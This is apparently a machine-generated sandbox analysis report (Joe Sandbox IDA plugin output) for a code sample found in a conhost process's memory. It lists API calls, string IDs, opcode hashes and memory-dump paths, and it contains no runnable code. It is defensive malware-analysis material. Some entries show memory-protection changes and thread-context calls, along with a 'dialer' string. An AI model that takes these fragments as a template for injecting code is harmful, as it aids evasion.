                                                          • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                          • String ID:
                                                          • API String ID: 190073905-0
                                                          • Opcode ID: c075132b8ffb7c8aa12930f0dbbf7461f30bd8bef12e3c9d76da9105ae1b8dff
                                                          • Instruction ID: c9af687361b548b4eaad491780747cf4b424ea6640cf1b26922da5b166fab028
                                                          • Opcode Fuzzy Hash: c075132b8ffb7c8aa12930f0dbbf7461f30bd8bef12e3c9d76da9105ae1b8dff
                                                          • Instruction Fuzzy Hash: 3081D530630645A6FA609B35B6713D9AB90A78778CF1460359ACD437B6EB38CD7F8702
                                                          APIs
                                                          • LoadLibraryExW.KERNEL32(?,?,?,00000146F6B0A3B3,?,?,?,00000146F6B09B9C,?,?,?,?,00000146F6B096BD), ref: 00000146F6B0A279
                                                          • GetLastError.KERNEL32(?,?,?,00000146F6B0A3B3,?,?,?,00000146F6B09B9C,?,?,?,?,00000146F6B096BD), ref: 00000146F6B0A287
                                                          • LoadLibraryExW.KERNEL32(?,?,?,00000146F6B0A3B3,?,?,?,00000146F6B09B9C,?,?,?,?,00000146F6B096BD), ref: 00000146F6B0A2B1
                                                          • FreeLibrary.KERNEL32(?,?,?,00000146F6B0A3B3,?,?,?,00000146F6B09B9C,?,?,?,?,00000146F6B096BD), ref: 00000146F6B0A2F7
                                                          • GetProcAddress.KERNEL32(?,?,?,00000146F6B0A3B3,?,?,?,00000146F6B09B9C,?,?,?,?,00000146F6B096BD), ref: 00000146F6B0A303
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000044.00000002.2378087271.00000146F6B01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000146F6B00000, based on PE: true
                                                          • Associated: 00000044.00000002.2378064668.00000146F6B00000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000044.00000002.2378118498.00000146F6B16000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000044.00000002.2378141512.00000146F6B21000.00000004.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000044.00000002.2378169606.00000146F6B23000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000044.00000002.2378191960.00000146F6B29000.00000002.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_68_2_146f6b00000_conhost.jbxd
                                                          Similarity
                                                          • API ID: Library$Load$AddressErrorFreeLastProc
                                                          • String ID: api-ms-
                                                          • API String ID: 2559590344-2084034818
                                                          • Opcode ID: c60201aec778344204bcef1649fbeec24da53dc38ebde7e62b727d681ed7f771
                                                          • Instruction ID: e8590d6370aed672462225ae75ee81d13489462e3fa84f208a3495374f322124
                                                          • Opcode Fuzzy Hash: c60201aec778344204bcef1649fbeec24da53dc38ebde7e62b727d681ed7f771
                                                          • Instruction Fuzzy Hash: 5A31EC32332640F1EE11DB62B9207D52794B70AB68F591935DD9D073B2EF39C96E8302
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000044.00000002.2378087271.00000146F6B01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000146F6B00000, based on PE: true
                                                          • Associated: 00000044.00000002.2378064668.00000146F6B00000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000044.00000002.2378118498.00000146F6B16000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000044.00000002.2378141512.00000146F6B21000.00000004.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000044.00000002.2378169606.00000146F6B23000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000044.00000002.2378191960.00000146F6B29000.00000002.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_68_2_146f6b00000_conhost.jbxd
                                                          Similarity
                                                          • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                          • String ID: CONOUT$
                                                          • API String ID: 3230265001-3130406586
                                                          • Opcode ID: 825ce686359a22e25232def11d6f08b48dee252c530cecc749e4dc9d381a3549
                                                          • Instruction ID: f255b35c95f65c42c6c118fa18959e8d254f17920125addcdd67c98ef20f9961
                                                          • Opcode Fuzzy Hash: 825ce686359a22e25232def11d6f08b48dee252c530cecc749e4dc9d381a3549
                                                          • Instruction Fuzzy Hash: 28118231330B4086E7909B62F86435967A4F78AFE8F144215EE9E877B4DF38CD6A8741
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000044.00000002.2378087271.00000146F6B01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000146F6B00000, based on PE: true
                                                          • Associated: 00000044.00000002.2378064668.00000146F6B00000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000044.00000002.2378118498.00000146F6B16000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000044.00000002.2378141512.00000146F6B21000.00000004.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000044.00000002.2378169606.00000146F6B23000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000044.00000002.2378191960.00000146F6B29000.00000002.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_68_2_146f6b00000_conhost.jbxd
                                                          Similarity
                                                          • API ID: CurrentProcessProtectVirtual$HandleModule
                                                          • String ID: wr
                                                          • API String ID: 1092925422-2678910430
                                                          • Opcode ID: 1983e7b2aaee179c95f49a9ecb428acdca8d3318c5669cc08ca5f07c1a06eaeb
                                                          • Instruction ID: bb6b63479a83c3cb886e696d7843b8539dd86a6c1a7bade689098b6db90d1d6e
                                                          • Opcode Fuzzy Hash: 1983e7b2aaee179c95f49a9ecb428acdca8d3318c5669cc08ca5f07c1a06eaeb
                                                          • Instruction Fuzzy Hash: 3811CE36320B4192EB248B35F0682A96B61F74AB88F050028DECD03764EF3DCA9AC705
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000044.00000002.2378087271.00000146F6B01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000146F6B00000, based on PE: true
                                                          • Associated: 00000044.00000002.2378064668.00000146F6B00000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000044.00000002.2378118498.00000146F6B16000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000044.00000002.2378141512.00000146F6B21000.00000004.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000044.00000002.2378169606.00000146F6B23000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000044.00000002.2378191960.00000146F6B29000.00000002.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_68_2_146f6b00000_conhost.jbxd
                                                          Similarity
                                                          • API ID: Thread$Current$Context
                                                          • String ID:
                                                          • API String ID: 1666949209-0
                                                          • Opcode ID: 6eebb9b89febcdc057b9e2366de4ef2aabdd815d2606de48d9a359409e558620
                                                          • Instruction ID: 17dc336b67dc88dd0e9cd652521074ffabe4c6f28488ce67a9d1747b74518cf5
                                                          • Opcode Fuzzy Hash: 6eebb9b89febcdc057b9e2366de4ef2aabdd815d2606de48d9a359409e558620
                                                          • Instruction Fuzzy Hash: 5FD1BD36218B8891DB70DB16F5A039A7BA0F389B88F101116EACD47B75DF3CC956DB01
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000044.00000002.2378087271.00000146F6B01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000146F6B00000, based on PE: true
                                                          • Associated: 00000044.00000002.2378064668.00000146F6B00000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000044.00000002.2378118498.00000146F6B16000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000044.00000002.2378141512.00000146F6B21000.00000004.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000044.00000002.2378169606.00000146F6B23000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000044.00000002.2378191960.00000146F6B29000.00000002.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_68_2_146f6b00000_conhost.jbxd
                                                          Similarity
                                                          • API ID: Heap$Process$AllocFree
                                                          • String ID: dialer
                                                          • API String ID: 756756679-3528709123
                                                          • Opcode ID: b0319cbd86f06d073dcced0acdf6bc1c6042bb64f80e9fc0b828a3d11e191795
                                                          • Instruction ID: 4081b65b10aa6e46d4b730783630a2825f9a0444fb3fc99b7a4f1a32f8f281f7
                                                          • Opcode Fuzzy Hash: b0319cbd86f06d073dcced0acdf6bc1c6042bb64f80e9fc0b828a3d11e191795
                                                          • Instruction Fuzzy Hash: D831C431721B52A2E754DF76F6683A96B90FB56B88F0850248ECC07B65EF34C87B8341
                                                          APIs
                                                          • GetLastError.KERNEL32(?,?,?,00000146F6B0DAE5,?,?,?,?,00000146F6B0DBA8), ref: 00000146F6B0D3DF
                                                          • FlsSetValue.KERNEL32(?,?,?,00000146F6B0DAE5,?,?,?,?,00000146F6B0DBA8), ref: 00000146F6B0D415
                                                          • FlsSetValue.KERNEL32(?,?,?,00000146F6B0DAE5,?,?,?,?,00000146F6B0DBA8), ref: 00000146F6B0D442
                                                          • FlsSetValue.KERNEL32(?,?,?,00000146F6B0DAE5,?,?,?,?,00000146F6B0DBA8), ref: 00000146F6B0D453
                                                          • FlsSetValue.KERNEL32(?,?,?,00000146F6B0DAE5,?,?,?,?,00000146F6B0DBA8), ref: 00000146F6B0D464
                                                          • SetLastError.KERNEL32(?,?,?,00000146F6B0DAE5,?,?,?,?,00000146F6B0DBA8), ref: 00000146F6B0D47F
                                                          Memory Dump Source
                                                          • Source File: 00000044.00000002.2378087271.00000146F6B01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000146F6B00000, based on PE: true
                                                          • Associated: 00000044.00000002.2378064668.00000146F6B00000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000044.00000002.2378118498.00000146F6B16000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000044.00000002.2378141512.00000146F6B21000.00000004.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000044.00000002.2378169606.00000146F6B23000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000044.00000002.2378191960.00000146F6B29000.00000002.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_68_2_146f6b00000_conhost.jbxd
                                                          Similarity
                                                          • API ID: Value$ErrorLast
                                                          • String ID:
                                                          • API String ID: 2506987500-0
                                                          • Opcode ID: 7fc5e4c2f951738899047b95e00f4424a4026db9f78df7ad039e65ab4a94a20b
                                                          • Instruction ID: be8241214ecff8eae14612cf04ba84dc73276e59e1bf47fe6f9e81eaa164a6dd
                                                          • Opcode Fuzzy Hash: 7fc5e4c2f951738899047b95e00f4424a4026db9f78df7ad039e65ab4a94a20b
                                                          • Instruction Fuzzy Hash: CC11633032528061F954973177753ED2A916B4A7FCF146724ADBE476F6DA289C3B8203
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000044.00000002.2378087271.00000146F6B01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000146F6B00000, based on PE: true
                                                          • Associated: 00000044.00000002.2378064668.00000146F6B00000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000044.00000002.2378118498.00000146F6B16000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000044.00000002.2378141512.00000146F6B21000.00000004.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000044.00000002.2378169606.00000146F6B23000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000044.00000002.2378191960.00000146F6B29000.00000002.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_68_2_146f6b00000_conhost.jbxd
                                                          Similarity
                                                          • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                          • String ID:
                                                          • API String ID: 517849248-0
                                                          • Opcode ID: b82d1bbac2a4a5b9d6dbe5f2df15dcec51c980f52b633491719cdad5f7bdf37e
                                                          • Instruction ID: 98f29aa7e5054571ba2971a85171dd2197181adc8c74e9f87833a4a8cf0165f6
                                                          • Opcode Fuzzy Hash: b82d1bbac2a4a5b9d6dbe5f2df15dcec51c980f52b633491719cdad5f7bdf37e
                                                          • Instruction Fuzzy Hash: 0D016D31714A4096EB14DB62B5A839963A1F789FC8F488134DE8D43765EE3CC99BC741
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000044.00000002.2378087271.00000146F6B01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000146F6B00000, based on PE: true
                                                          • Associated: 00000044.00000002.2378064668.00000146F6B00000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000044.00000002.2378118498.00000146F6B16000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000044.00000002.2378141512.00000146F6B21000.00000004.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000044.00000002.2378169606.00000146F6B23000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000044.00000002.2378191960.00000146F6B29000.00000002.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_68_2_146f6b00000_conhost.jbxd
                                                          Similarity
                                                          • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                          • String ID:
                                                          • API String ID: 449555515-0
                                                          • Opcode ID: 8662155c9f7376030badf6deb1f9cc8df7edcdadcbb5a73039a50034e0df76dd
                                                          • Instruction ID: df0ee3cef39982fc7aa210a35120d66d6e039d937343159590aa72960a7f9cb8
                                                          • Opcode Fuzzy Hash: 8662155c9f7376030badf6deb1f9cc8df7edcdadcbb5a73039a50034e0df76dd
                                                          • Instruction Fuzzy Hash: 5B016D34621B4492EB259B31F86C79923A0BB4AB49F040528C98D46774EF3DC96EC702
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000044.00000003.2254610774.00000146F6AD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000146F6AD0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_68_3_146f6ad0000_conhost.jbxd
                                                          Similarity
                                                          • API ID: CurrentImageNonwritable__except_validate_context_record
                                                          • String ID: displacement map'$csm$f
                                                          • API String ID: 3242871069-3478954885
                                                          • Opcode ID: 911b6d09506e82739bdc666af230172d8f47b592f6a0b26bc0314746b579121d
                                                          • Instruction ID: 1f6b35a9d0d68322aa46315971d6771835e8d7068494a4f8879e5e9a0385bf88
                                                          • Opcode Fuzzy Hash: 911b6d09506e82739bdc666af230172d8f47b592f6a0b26bc0314746b579121d
                                                          • Instruction Fuzzy Hash: 5F51DF362122008AEB25CF35F464B983796F352BDCF1081A1DECA437A8DB35DD6AC702
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000044.00000002.2378087271.00000146F6B01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000146F6B00000, based on PE: true
                                                          • Associated: 00000044.00000002.2378064668.00000146F6B00000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000044.00000002.2378118498.00000146F6B16000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000044.00000002.2378141512.00000146F6B21000.00000004.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000044.00000002.2378169606.00000146F6B23000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000044.00000002.2378191960.00000146F6B29000.00000002.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_68_2_146f6b00000_conhost.jbxd
                                                          Similarity
                                                          • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                          • String ID: csm$f
                                                          • API String ID: 2395640692-629598281
                                                          • Opcode ID: 911b6d09506e82739bdc666af230172d8f47b592f6a0b26bc0314746b579121d
                                                          • Instruction ID: ad003fe22fcb01ce915ac49c68eb8e816938668d7b58fdca21f68b1f67411c67
                                                          • Opcode Fuzzy Hash: 911b6d09506e82739bdc666af230172d8f47b592f6a0b26bc0314746b579121d
                                                          • Instruction Fuzzy Hash: B451D536221701AADB14EB36F5247993B95F342B8DF11A020DB9E4379AEB35CD5AC701
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000044.00000003.2254610774.00000146F6AD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000146F6AD0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_68_3_146f6ad0000_conhost.jbxd
                                                          Similarity
                                                          • API ID: CurrentImageNonwritable__except_validate_context_record
                                                          • String ID: displacement map'$csm$f
                                                          • API String ID: 3242871069-3478954885
                                                          • Opcode ID: 83240c1be95a85a2168ddca1a7ce1f874f475d626e55e81d58b9bdf2105a26fb
                                                          • Instruction ID: 008bddb556d0092e0377e594e4234462f2c2c00787e1ef61c8790838cd8c164a
                                                          • Opcode Fuzzy Hash: 83240c1be95a85a2168ddca1a7ce1f874f475d626e55e81d58b9bdf2105a26fb
                                                          • Instruction Fuzzy Hash: A331AD3220164096E714DF22F864B993BAAF352BDCF158054EEDE037A5CB39CD6AC706
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000044.00000002.2378087271.00000146F6B01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000146F6B00000, based on PE: true
                                                          • Associated: 00000044.00000002.2378064668.00000146F6B00000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000044.00000002.2378118498.00000146F6B16000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000044.00000002.2378141512.00000146F6B21000.00000004.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000044.00000002.2378169606.00000146F6B23000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000044.00000002.2378191960.00000146F6B29000.00000002.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_68_2_146f6b00000_conhost.jbxd
                                                          Similarity
                                                          • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                          • String ID: csm$f
                                                          • API String ID: 2395640692-629598281
                                                          • Opcode ID: cd5e78f7a824d61b6a4bd1de3076d2d48bd843f6231fa7e8b66aa639a396b76c
                                                          • Instruction ID: d78a5896d1254e70af6ea3a02e15ff3a07882ff892e8b1e037489ac3a1a11c8c
                                                          • Opcode Fuzzy Hash: cd5e78f7a824d61b6a4bd1de3076d2d48bd843f6231fa7e8b66aa639a396b76c
                                                          • Instruction Fuzzy Hash: FB31C435220741A6E724EF22F9647993B94F342B8CF05A014AEDE437A6DB38CD6AC705
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000044.00000002.2378087271.00000146F6B01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000146F6B00000, based on PE: true
                                                          • Associated: 00000044.00000002.2378064668.00000146F6B00000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000044.00000002.2378118498.00000146F6B16000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000044.00000002.2378141512.00000146F6B21000.00000004.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000044.00000002.2378169606.00000146F6B23000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000044.00000002.2378191960.00000146F6B29000.00000002.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_68_2_146f6b00000_conhost.jbxd
                                                          Similarity
                                                          • API ID: FinalHandleNamePathlstrlen
                                                          • String ID: \\?\
                                                          • API String ID: 2719912262-4282027825
                                                          • Opcode ID: d5ec68f96dae6b7ecf4cdbbeb250ae8ba7b628e03b919f4631671672637286c6
                                                          • Instruction ID: cd33a85492edcac8cd4b86a101e09e060abf8368369994b3e381718b372163ab
                                                          • Opcode Fuzzy Hash: d5ec68f96dae6b7ecf4cdbbeb250ae8ba7b628e03b919f4631671672637286c6
                                                          • Instruction Fuzzy Hash: B3F0AF32324680A2EB308B34F5E439A6760F785B8CF845020DACD42564EE7CCAAECB01
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000044.00000002.2378087271.00000146F6B01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000146F6B00000, based on PE: true
                                                          • Associated: 00000044.00000002.2378064668.00000146F6B00000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000044.00000002.2378118498.00000146F6B16000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000044.00000002.2378141512.00000146F6B21000.00000004.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000044.00000002.2378169606.00000146F6B23000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000044.00000002.2378191960.00000146F6B29000.00000002.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_68_2_146f6b00000_conhost.jbxd
                                                          Similarity
                                                          • API ID: CombinePath
                                                          • String ID: \\.\pipe\
                                                          • API String ID: 3422762182-91387939
                                                          • Opcode ID: e19f02f46d5f5175cba9bea6f0663c254bbceec99479fcaac31b51916b51a9ba
                                                          • Instruction ID: 5ae736b2629b7ac713addf57ffb69b1cb0873ce7a05c663ce18a9ddfdfd4fe8c
                                                          • Opcode Fuzzy Hash: e19f02f46d5f5175cba9bea6f0663c254bbceec99479fcaac31b51916b51a9ba
                                                          • Instruction Fuzzy Hash: 4BF0897032478091EA204B27B964199A651BB4DFC4F085030EE9E07738DF2CC96BC701
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000044.00000002.2378087271.00000146F6B01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000146F6B00000, based on PE: true
                                                          • Associated: 00000044.00000002.2378064668.00000146F6B00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378118498.00000146F6B16000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378141512.00000146F6B21000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378169606.00000146F6B23000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378191960.00000146F6B29000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_68_2_146f6b00000_conhost.jbxd
                                                          Similarity
                                                          • API ID: AddressFreeHandleLibraryModuleProc
                                                          • String ID: CorExitProcess$mscoree.dll
                                                          • API String ID: 4061214504-1276376045
                                                          • Opcode ID: 98eb24e4d57f1585c54f2d3d16aa4b08ded3b1fa128793edf9192e1fe004f7b7
                                                          • Instruction ID: 704a484ae3ff6636a57b22812343704bfad55ac1e5968dbae4e73cbe90daf0ac
                                                          • Opcode Fuzzy Hash: 98eb24e4d57f1585c54f2d3d16aa4b08ded3b1fa128793edf9192e1fe004f7b7
                                                          • Instruction Fuzzy Hash: 75F06271321604A1EE108B34F8A83995330FB4A7A9F541215C6EE461F4DF3CC86ED301
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000044.00000002.2378087271.00000146F6B01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000146F6B00000, based on PE: true
                                                          • Associated: 00000044.00000002.2378064668.00000146F6B00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378118498.00000146F6B16000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378141512.00000146F6B21000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378169606.00000146F6B23000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378191960.00000146F6B29000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_68_2_146f6b00000_conhost.jbxd
                                                          Similarity
                                                          • API ID: CurrentThread
                                                          • String ID:
                                                          • API String ID: 2882836952-0
                                                          • Opcode ID: 758a31af71cbbd98710326f5d5dd73fd8f3faa0c353224d70a8a3d8e98f497e1
                                                          • Instruction ID: ce3e5a340b28ba34dfb5382e66257825f23a92809ef55249051b301fe51ea021
                                                          • Opcode Fuzzy Hash: 758a31af71cbbd98710326f5d5dd73fd8f3faa0c353224d70a8a3d8e98f497e1
                                                          • Instruction Fuzzy Hash: 2F02EB3622CB8486D760CB65F5A439ABBA0F3C5794F105015EACE87B69DF7CC859CB01
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000044.00000002.2378087271.00000146F6B01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000146F6B00000, based on PE: true
                                                          • Associated: 00000044.00000002.2378064668.00000146F6B00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378118498.00000146F6B16000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378141512.00000146F6B21000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378169606.00000146F6B23000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378191960.00000146F6B29000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_68_2_146f6b00000_conhost.jbxd
                                                          Similarity
                                                          • API ID: CurrentThread
                                                          • String ID:
                                                          • API String ID: 2882836952-0
                                                          • Opcode ID: a4c708464c669e8ac6b2107c0414dd5148c6b67da4caf1212569ceb4eb7b4d9f
                                                          • Instruction ID: f49f88ec219468046798eb801acbdd51567cd1a0aafb522fea58007a9fc25928
                                                          • Opcode Fuzzy Hash: a4c708464c669e8ac6b2107c0414dd5148c6b67da4caf1212569ceb4eb7b4d9f
                                                          • Instruction Fuzzy Hash: 4761ED32129B4496E760CB25F66479ABBE0F38A788F501115EACD47BB4DB7CC859CF01
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000044.00000003.2254610774.00000146F6AD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000146F6AD0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_68_3_146f6ad0000_conhost.jbxd
                                                          Similarity
                                                          • API ID: _set_statfp
                                                          • String ID:
                                                          • API String ID: 1156100317-0
                                                          • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                          • Instruction ID: 8c266b06c706cc7fa8022ab1d05744c777aba39d606e61e16b1767b86428c3e0
                                                          • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                          • Instruction Fuzzy Hash: 0A117332A14E1141FA54157BF4763E91181AB7737CF454A34AAFE076FACF288C6F9206
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000044.00000002.2378087271.00000146F6B01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000146F6B00000, based on PE: true
                                                          • Associated: 00000044.00000002.2378064668.00000146F6B00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378118498.00000146F6B16000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378141512.00000146F6B21000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378169606.00000146F6B23000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378191960.00000146F6B29000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_68_2_146f6b00000_conhost.jbxd
                                                          Similarity
                                                          • API ID: _set_statfp
                                                          • String ID:
                                                          • API String ID: 1156100317-0
                                                          • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                          • Instruction ID: e8b77affa320c937df7277b01b18f038b663882237b99e69fb74665e4ed23667
                                                          • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                          • Instruction Fuzzy Hash: FF118232A30A1121FA541378F4763E911816B5B37CF584634ABFE466FADB688C6F4303
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000044.00000002.2378087271.00000146F6B01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000146F6B00000, based on PE: true
                                                          • Associated: 00000044.00000002.2378064668.00000146F6B00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378118498.00000146F6B16000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378141512.00000146F6B21000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378169606.00000146F6B23000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378191960.00000146F6B29000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_68_2_146f6b00000_conhost.jbxd
                                                          Similarity
                                                          • API ID: CallEncodePointerTranslator
                                                          • String ID: MOC$RCC
                                                          • API String ID: 3544855599-2084237596
                                                          • Opcode ID: 05fb19cb5d958d360e5f46d501e280b4416caeae58329d8bd7a5de4c8cbcf2a2
                                                          • Instruction ID: dfe7db06bc1ce74b2971c940f18112277ff0195f7b7d7de5b9bb9b34fbe9b83b
